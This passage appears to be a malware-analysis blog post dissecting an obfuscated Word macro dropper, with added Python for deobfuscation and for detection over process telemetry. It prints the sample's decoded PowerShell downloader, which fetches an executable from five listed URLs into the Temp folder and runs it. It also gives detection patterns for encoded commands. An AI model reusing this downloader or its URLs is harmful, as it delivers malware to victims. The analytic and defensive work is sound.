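The three steps just described (undo the cmd /v variable trick, base64-decode the -e argument, and turn the list of decimal values back into text) can be chained in one script. The Python below is an added example, not from the post or from the sample, run on a constructed command line (SAMPLE_CMDLINE) built in the same shape: fragment variables whose names are literal %...% tokens, junk set statements in between, delayed-expansion references, and a UTF-16LE/base64 script whose body is a delimiter-separated list of character codes encoding a harmless stand-in. The variable names, the delimiters and the encoded script are all made up.

```python
import base64
import re

# Constructed stand-in for the macro's command line (not the sample's own
# strings). The inner script is a delimiter-separated list of decimal
# character codes wrapped in a small decoder stub, mirroring the second
# obfuscation layer; the codes spell a harmless phrase.
INNER_SCRIPT = ("( ( '101:99~104!111{32&104Y105'.sPLiT( 'Y&{:!~' ) "
                "| % { [int]$_ -as [char] } ) -join '' )")
# powershell -e expects base64 of the UTF-16LE encoded script
ENCODED = base64.b64encode(INNER_SCRIPT.encode('utf-16le')).decode('ascii')
SAMPLE_CMDLINE = (
    'cmd /v /c "set %aBcDe%=wers&&set %jUnKx%=QwErTy&&set %fGhIj%=po'
    '&&set %jUnKy%=AsDfGh&&set %kLmNo%=hell&&set %jUnKz%=ZxCvBn'
    '&&!%fGhIj%!!%aBcDe%!!%kLmNo%! -e ' + ENCODED + '"'
)

SET_RE = re.compile(r'^\s*set\s+([^=\s]+)=(.*)$', re.IGNORECASE)
DELAYED_RE = re.compile(r'!([^!\s]+)!')
ENC_ARG_RE = re.compile(r'-e\w*\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
QUOTED_RE = re.compile(r"'([^']*)'")


def expand_delayed(cmdline: str) -> str:
    """Emulate cmd /v: record every 'set name=value' joined by &&, then
    replace the !name! references in the remaining command with the values.
    On the cmd command line an undefined %name% is left as-is, so the
    variables really are called %aBcDe% etc., percent signs included."""
    m = re.search(r'/[cC]\s+(.*)$', cmdline, re.DOTALL)
    body = m.group(1) if m else cmdline
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]
    env = {}
    command = ''
    for part in body.split('&&'):
        s = SET_RE.match(part)
        if s:
            env[s.group(1)] = s.group(2)
        else:
            command = part
    return DELAYED_RE.sub(lambda r: env.get(r.group(1), r.group(0)), command)


def decode_encoded_command(cmdline: str) -> str:
    """Pull the -e / -enc / -EncodedCommand argument and decode it the way
    powershell.exe does: base64 of a UTF-16LE string."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        raise ValueError('no -EncodedCommand argument found')
    return base64.b64decode(m.group(1)).decode('utf-16le')


def decimal_codes_to_text(script: str) -> str:
    """Take the quoted string that carries the most decimal runs (the
    payload), split it on the delimiter characters and map each number to
    its character. Restricting to that string leaves out numbers used
    elsewhere in the stub, such as array indexes, which are not codes."""
    candidates = QUOTED_RE.findall(script)
    payload = max(candidates, key=lambda s: len(re.findall(r'\d+', s)))
    return ''.join(chr(int(n)) for n in re.findall(r'\d+', payload))


def deobfuscate(cmdline: str) -> dict:
    """Run the three layers in order and keep each intermediate result."""
    expanded = expand_delayed(cmdline)
    script = decode_encoded_command(expanded)
    return {'expanded': expanded, 'script': script,
            'final': decimal_codes_to_text(script)}


if __name__ == '__main__':
    for stage, value in deobfuscate(SAMPLE_CMDLINE).items():
        print(f'{stage}: {value}')
```

Selecting the quoted string with the most numeric runs sidesteps the problem noted above: values like the 3, 11, 2 on the first line are array indexes inside the decoder stub, not character codes, so they are never fed to chr().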
The code uses "DownloadFile" to fetch an exe from the listed servers, names the exe with a random number, and saves it to the system temp directory. It then runs the exe with "Start-Process".
# Decoded PowerShell command
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://agentsinaction.de/NYkSf/,http://edonnet.de/r/,http://mybuyingagent.com/SkAU/,http://markus-fleischmann.de/vWg/,http://administratiekantoorcleo.nl/tBf/'.Split(',');
$name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
    try{
        $webclient.DownloadFile($url.ToString(), $path);
        Start-Process $path;break;
    }
    catch{write-host $_.Exception.Message;}
}
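What this downloader leaves behind in process telemetry is the part a defender can act on. The Python below is an added example, not from the post or the sample, that runs a few simple rules over constructed process-creation records in a Sysmon Event ID 1 style (parent image, child image, command line); the paths, file names and the encoded blob are all made up. It flags each link of the chain the sample produces: an Office process spawning a shell, cmd /v delayed expansion with !...! references, a long -e base64 argument, and an executable started from the Temp directory by a shell.

```python
import base64
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}

# -e / -enc followed by a long base64 run
ENCODED_RE = re.compile(r'-e\w*\s+[A-Za-z0-9+/=]{40,}', re.IGNORECASE)
# cmd /v switch together with a delayed-expansion !name! reference
DELAYED_RE = re.compile(r'/v\b.*![^!\s]+!', re.IGNORECASE | re.DOTALL)

# Constructed stand-in for the encoded script (harmless text), long enough
# to pass the length threshold in ENCODED_RE.
FAKE_ENC = base64.b64encode('Write-Host stand-in'.encode('utf-16le')).decode('ascii')

OFFICE = r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
CMD = r'C:\Windows\System32\cmd.exe'
PS = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

# (ParentImage, Image, CommandLine): all constructed records
SAMPLE_EVENTS = [
    (r'C:\Windows\explorer.exe', OFFICE, '"' + OFFICE + '" /n invoice.doc'),
    (r'C:\Windows\explorer.exe', CMD, 'cmd /c dir'),
    (OFFICE, CMD, 'cmd /v /c "set %aBcDe%=wers&&set %fGhIj%=po&&set %kLmNo%=hell'
                  '&&!%fGhIj%!!%aBcDe%!!%kLmNo%! -e ' + FAKE_ENC + '"'),
    (CMD, PS, 'powershell -e ' + FAKE_ENC),
    (PS, r'C:\Users\alice\AppData\Local\Temp\41213.exe',
         r'"C:\Users\alice\AppData\Local\Temp\41213.exe"'),
]


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(parent: str, image: str, cmdline: str) -> list:
    """Return the names of the rules an event matches, in a fixed order."""
    tags = []
    if basename(parent) in OFFICE_APPS and basename(image) in SHELLS:
        tags.append('office-spawns-shell')
    if DELAYED_RE.search(cmdline):
        tags.append('cmd-delayed-expansion')
    if ENCODED_RE.search(cmdline):
        tags.append('encoded-powershell')
    if basename(parent) in SHELLS and '\\temp\\' in image.lower():
        tags.append('temp-exe-from-shell')
    return tags


def triage(events) -> dict:
    """Map event index -> matched rules, keeping only events that hit."""
    hits = {}
    for i, (parent, image, cmdline) in enumerate(events):
        tags = classify(parent, image, cmdline)
        if tags:
            hits[i] = tags
    return hits


if __name__ == '__main__':
    for i, tags in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][1], tags)
```

No single rule is conclusive on its own (encoded PowerShell has legitimate uses), but the combination seen here, Word spawning cmd with delayed expansion and an encoded command, followed by an executable starting out of Temp, is the shape of the sample analysed above and is worth alerting on as a chain.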
With the code analysed, press "Alt+F11" to open the macro code, change the Shell window-style argument to 1, and debug to see what happens. Probably because so much time has passed and the servers have gone offline, the code did not execute successfully.
Summary
These are the basic steps for analysing a macro virus; the follow-up analysis of the PE sample is the same as usual. The only difference is that the virus uses all kinds of obfuscation to hinder analysis. I am also still fairly new to this, so consider this article a decent start; when I come across other samples I will analyse and write them up properly.